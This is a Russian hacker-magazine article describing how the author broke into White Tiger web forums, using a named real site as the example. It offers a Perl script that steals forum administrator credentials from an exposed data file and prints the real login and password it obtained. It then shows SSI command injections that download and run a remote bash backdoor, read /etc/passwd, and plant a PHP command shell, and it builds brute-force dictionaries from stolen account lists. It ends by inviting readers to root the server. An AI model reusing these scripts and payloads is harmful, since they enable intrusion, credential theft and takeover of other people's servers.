Прошло уже почти три года, как я обнаружил досадную багу в форумах производителя White Tiger. Не знаю, почему я о ней вспомнил, но решил еще раз помучить поисковики и найти жертву. Ведь дефейс форума (как три года назад) меня уже нисколько не интересовал.

Меня поразило то число линков, которое мне выдал гугль на запрос «wtboard/index.shtml» (почему я выбрал именно такой запрос скажу немного ниже). Среди ответов были дефейснутые сайты (актуальность бага, несмотря на свою заплесневелость, еще не потеряла), сообщения о закрытости форума из-за проблем безопасности, а также вполне рабочие борды. Один из таких форумов был www.galactic.ru. Его мы сегодня и обсудим как наглядный пример.

Как ты помнишь, суть баги была в том, что админы не закрывали доступ на файлы в директории /data относительно web-сервера. В поставке форума есть файл .htaccess, который запрещает обзор директории, но не более. На сами файлы следует устанавливать атрибуты
так, чтобы любой пользователь их не мог прочитать (или менять путь к /data за пределы web-сервера). Галактик-форум не позволял обозревать дата-каталог, но вполне давал прочитать отдельные файлы в нем.

По дефолту, файл, хранящий записи администраторов форума находится в /data/wtbadmin.txt. Честно сказать, 
меня ломало каждый раз проверять наличие этого файла, поэтому я написал небольшой скрипт, делающий эту работу за тебя. Назвал я его find.pl.

#!/usr/bin/perl

## Auto check for file /data/wtbadmin.txt
## By Forb (forb@real.xakep.ru)

$|++;
use IO::Socket;
use Getopt::Std; ##
Выключаем буферизацию и используем модули getopt и
socket.

getopt(«sp»); ## Парсим командную строку на предмет опций -s и -p

$port=$opt_p || 80; ## Устанавливаем порт, если он был явно задан
$server=$opt_s || exit print «Usage $0 <-s server> [-p port]\n»; ##
Сервер берем из значения опции -s

$file=»/data/wtbadmin.txt»; ##
Файл, который требуется найти

$sock=IO::Socket::INET->new(«$server:$port») || die «Cant create sock\n»; ## Создаем сокет
$sock->autoflush(1); ##
Вырубаем буферизацию
print $sock «GET $file HTTP/1.0\nHost: $server\n\n»; ##
Катаем запрос

$sock->recv($answer,1024); ## Получаем ответ
@answer=split(«\n»,$answer); ##
Преобразуем многострочный ответ в один массив (для удобства)
$status=$answer[0]; 
$acct=$answer[scalar @answer-1]; ##
Первая строка массива — статус, последняя — содержимое файла
if($status=~/200 OK/) { ##
Если статус — 200 OK (файл найден и доступен для чтения)
print «wtbadmin.txt found!\n»; ##
Пишем на экран
($login,$password)=split(«;;»,$acct); ##
Выделяем из содержимого файла логин и пароль (разделитель пара точек с запятой)
print «Login is: $login, Password is: $password.\n»;
print «Try this account at $server/wtboard/wtbadmin.htm\n»; ##
Пишем логин и пароль, а также напоминаем ссылку на web-админку
} else {
print «wtbadmin.txt NOT found!\n»; ##
В противном случае выводим на экран — файл не найден
}
close($sock); ##
Закроем сокет

Вот, собственно, и все. Если хочешь быть обладателем этого скрипта — скопируй его отсюда, либо слей с адреса
http://kamensk.net.ru/forb/1/x/find.tar.gz
(без комментариев).

С этим скриптом поиск будет куда удобнее и увлекательнее. К примеру, в моем случае ответ был следующий:

[root@forbik site]# perl find.pl -s www.galactic.ru
wtbadmin.txt found!
Login is: max, Password is: maxik.
Try this account at www.galactic.ru/wtboard/wtbadmin.htm

Становится понятным, что аккаунт для веб-администрирования был получен :). Остается его применить.

Вот тут то и наступает самое интересное! Три года назад в статье я вообще ничего не говорил об администрировании, полагаясь на твою логику и фантазию ;). В итоге получилось, что все форумы, которые являлись уязвимыми были задефейсены или загажены пакостливыми постами :).

Мы пойдем другим путем! Когда я ломал какой-либо форум по своей же методике, я старался зарутать сервер. Это вполне реально, несмотря на апачевые web-права. Достаточно посадить бэкдор в систему и запустить его. Моим любимым бэкдором (хотя и немого кривым, я имею ввиду код) является
http://kamensk.net.ru/forb/1/shell. Он открывает 5051 порт и запускает на нем /bin/bash :). Это нам и нужно.

Итак, топаем на страницу администрирования www.galactic.ru/wtboard/wtbadmin.htm. Выбираем раздел «Внешний вид форума и интерфейс» (выбран по умолчанию). Вводим логин и пароль, полученные моим скриптом, и попадаем в среду web-администрирования.

Нас интересует Index-поле главной страницы index.shtml. С помощью вызовов SSI мы скачаем и посадим наш бэкдор. Запись будет выглядеть следующим образом:

<!—#exec cmd=»wget http://url/path/to/bd.pl -O /tmp/bd.pl»—> <!—#exec cmd=»perl /tmp/bd.pl»—>

После этого, сохраняем структуру и переходим на главную страницу. Если все в порядке, то на сервере откроется 5051 порт. Учить тебя локальному захвату системы я не буду — это ты и так умеешь ;). Не забудь убрать за собой эти строки, повторно зайдя в систему, так как второй раз скачивать бэкдор не желательно.

Нас интересует немного другое… Дело в том, что на galactic был закрыт весь исходящий трафик, поэтому скачать файл не удалось. Кстати, продиагностировать это можно, используя опцию -b в вызове wget, а затем прочитав wget-log (все через SSI). Если ты запортачил страницу и не можешь загрузить index.shtml, выбери раздел «Восстановление Index» и верни структуру страницы.

Я задумался о других методах получения привилегий, используя эту багу. Во-первых, пункт «Изменение списка участников, игнор лист» может подарить тебе учетную запись на другой сервер или mail-account (юзерам свойственно юзать одинаковые пароли как на форум, так и на мыльник. А последний они часто оставляют в форуме :)).

Также можно сделать SSI-команду cat /etc/passwd и пробрутать учетную запись вида login:login на какой-либо сервис. О такого типа брутфорсерах часто писалось, поэтому расскажу о методе поверхностно.

После вызова, бекапим /etc/passwd на диск и с помощью легкого perl-скрипта преобразуем файл в словарь:

#!/usr/bin/perl

open(PWD,»passwd»);
open(OUT,»>out»);
while(<PWD>) {
($login,$pwd)=split(«:»,$_);
print OUT «$login\:$login\n»;
}
close PWD;
close OUT;

Становится ясно. Скрипт генерирует словарь вида login:login, который можно использовать в разного рода брутфорсерах (например Brutus). Метод часто работает, но сломать galactic я им не сумел :(.

Оставался один выход — написать perl или php-скрипт, который был способен выполнить команды. Это можно было сделать тем же SSI-вызовом вида echo «<?passthru($cmd)?>» > file.php», но он почему то не захотел выполнится.

В итоге, я оставил этот сервер в покое. Попробуй зарутать его, может у тебя получится. Но, естественно, ответственность за содеянное понесешь только ты ;).

И напоследок скажу, почему я выбрал именно такой поисковой запрос. Дело в том, что расширение shtml у главной страницы ставится опционально, а для SSI наличие такого расширения очень важно. Иначе вызовы просто не будут работать.

И хватит уже дефейсить форумы! Это может сделать каждый. Будь на планку выше, и попробуй сделать с багой что-либо стоящее. Ведь ты же не скрипткидди, так?

Оставить мнение

Check Also

Скрытая сила пробела. Эксплуатируем критическую уязвимость в Apache Tomcat

В этой статье мы поговорим о баге в Apache Tomcat, популярнейшем веб-сервере для сайтов на…